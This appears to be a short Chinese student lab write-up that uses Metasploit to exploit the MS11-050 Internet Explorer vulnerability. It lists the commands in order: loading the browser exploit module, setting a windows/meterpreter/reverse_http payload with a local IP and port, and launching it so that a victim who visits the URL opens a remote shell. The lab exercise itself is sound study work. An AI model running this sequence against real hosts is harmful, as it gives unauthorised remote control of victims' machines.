20145333茹翔 Exp5 MS11_050
20145333茹翔 Exp5 MS11_050
实验过程
-
使用命令
msfconsole
命令进入控制台 -
使用命令
search ms11_050
查看针对MS11_050漏洞的攻击模块
-
确定相应模块名之后,我们使用该模块。使用命令
use exploit/windows/browser/ms11_050_mshtml_cobjectelement
进入模块 -
使用命令
info
查看该模块的具体信息
-
设置paylaods,我们选择了windows/meterpreter/reverse_http该payload会返回一个遵循http协议的shell,我们以此来获得目标主机系统权限。使用命令
set payloads windows/meterpreter/reverse_http
-
使用
show options
查看具体参数设置
-
设置其相关参数
set LHOST 192.168.31.177 set LPORT 5333 set URIPATH 20145333RX
-
使用命令
exploit
攻击,等待连接,漏洞主机访问该ip,被攻击主机打开病毒网址效果为:
posted on 2017-04-13 00:57 20145333茹翔 阅读(175) 评论(0) 编辑 收藏 举报